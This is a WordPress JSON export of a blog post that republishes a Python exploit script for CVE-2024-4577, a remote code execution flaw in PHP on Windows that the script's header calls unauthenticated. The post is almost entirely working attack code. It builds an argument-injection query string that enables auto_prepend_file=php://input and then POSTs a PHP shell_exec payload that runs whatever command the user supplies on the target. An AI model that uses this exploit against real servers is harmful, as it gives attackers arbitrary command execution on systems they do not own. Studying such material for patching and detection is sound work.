{"id":57504,"date":"2024-06-14T18:59:34","date_gmt":"2024-06-14T15:59:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179085\/php83-exec.txt"},"modified":"2024-06-14T18:59:34","modified_gmt":"2024-06-14T15:59:34","slug":"php-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/php-remote-code-execution\/","title":{"rendered":"PHP Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)<br \/># Exploit Author: Yesith Alvarez<br \/># Vendor Homepage: https:\/\/www.php.net\/downloads.php<br \/># Version: PHP 8.3,* &lt; 8.3.8, 8.2.*&lt;8.2.20, 8.1.*, 8.1.29<br \/># CVE : CVE-2024-4577<\/p>\n<p>from requests import Request, Session<br \/>import sys<br \/>import json<\/p>\n<p>def title():<br \/>print(&#8221;&#8217;<\/p>\n<p>_______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ <br \/>\/ ____\\ \\ \/ \/ ____| |__ \\ \/ _ \\__ \\| || | | || | | ____|____ |____ |<br \/>| | \\ \\ \/ \/| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ \/ \/ \/ \/ <br \/>| | \\ \\\/ \/ | __|______\/ \/| | | |\/ \/|__ _|______|__ _|___ \\ \/ \/ \/ \/ <br \/>| |____ \\ \/ | |____ \/ \/_| |_| \/ \/_ | | | | ___) | \/ \/ \/ \/ <br \/>\\_____| \\\/ |______| |____|\\___\/____| |_| |_| |____\/ \/_\/ \/_\/ <\/p>\n<p>Author: Yesith Alvarez<br \/>Github: https:\/\/github.com\/yealvarez<br \/>Linkedin: https:\/\/www.linkedin.com\/in\/pentester-ethicalhacker\/<br \/>Code improvements: https:\/\/github.com\/yealvarez\/CVE\/blob\/main\/CVE-2024-4577\/exploit.py<br \/>&#8221;&#8217;) <\/p>\n<p>def exploit(url, command): <br \/>payloads = {<br \/>&#8216;&lt;?php echo &#8220;vulnerable&#8221;; ?&gt;&#8217;,<br \/>&#8216;&lt;?php echo shell_exec(&#8220;&#8216;+command+'&#8221;); ?&gt;&#8217; <br \/>} <br \/>headers = {<br \/>&#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko\/20100101 Firefox\/123.0&#8217;,<br \/>&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;}<br \/>s = Session()<br \/>for payload in payloads:<br \/>url = url + &#8220;\/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp:\/\/input&#8221;<br \/>req = Request(&#8216;POST&#8217;, url, data=payload, headers=headers)<br \/>prepped = req.prepare()<br \/>del prepped.headers[&#8216;Content-Type&#8217;]resp = s.send(prepped,<br \/>verify=False,<br \/>timeout=15)<br \/>#print(prepped.headers)<br \/>#print(url)<br \/>#print(resp.headers) <br \/>#print(payload)<br \/>print(resp.status_code)<br \/>print(resp.text)<\/p>\n<p>if __name__ == &#8216;__main__&#8217;:<br \/>title()<br \/>if(len(sys.argv) &lt; 2):<br \/>print(&#8216;[+] USAGE: python3 %s https:\/\/&lt;target_url&gt; &lt;command&gt;\\n&#8217;%(sys.argv[0]))<br \/>print(&#8216;[+] USAGE: python3 %s https:\/\/192.168.0.10\\n dir&#8217;%(sys.argv[0])) <br \/>exit(0)<br \/>else:<br \/>exploit(sys.argv[1],sys.argv[2])<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https:\/\/www.php.net\/downloads.php# Version: PHP 8.3,* &lt; 8.3.8, 8.2.*&lt;8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577 from requests import Request, Sessionimport sysimport json def title():print(&#8221;&#8217; _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ \/ ____\\ \\ \/ \/ ____| |__ &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57504","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57504"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57504\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}